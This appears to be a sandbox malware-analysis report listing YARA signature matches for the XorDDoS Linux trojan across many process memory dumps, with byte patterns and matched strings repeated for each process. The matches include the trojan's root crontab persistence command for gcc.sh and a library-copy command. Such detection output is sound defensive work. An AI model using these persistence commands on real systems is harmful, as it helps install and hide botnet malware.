6387.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6438.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6461.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6463.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6384.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6229.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6529.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
